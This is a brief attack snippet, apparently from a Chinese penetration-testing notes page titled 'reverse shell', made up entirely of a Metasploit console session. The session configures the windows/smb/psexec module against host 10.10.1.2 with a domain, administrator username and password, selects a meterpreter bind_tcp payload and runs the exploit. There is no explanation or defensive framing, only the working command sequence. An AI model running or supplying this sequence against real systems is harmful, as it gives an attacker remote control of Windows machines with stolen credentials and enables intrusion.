2024年3月24日发(作者:)

反弹shell

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2

RHOST => 10.10.1.2

msf exploit(windows/smb/psexec) > set SMBDomain moonsec

SMBDomain => moonsec

msf exploit(windows/smb/psexec) > set SMBUser administrator

SMBUser => administrator

msf exploit(windows/smb/psexec) > set SMBPass xxx123456..

SMBPass => xxx123456..

msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(windows/smb/psexec) > exploit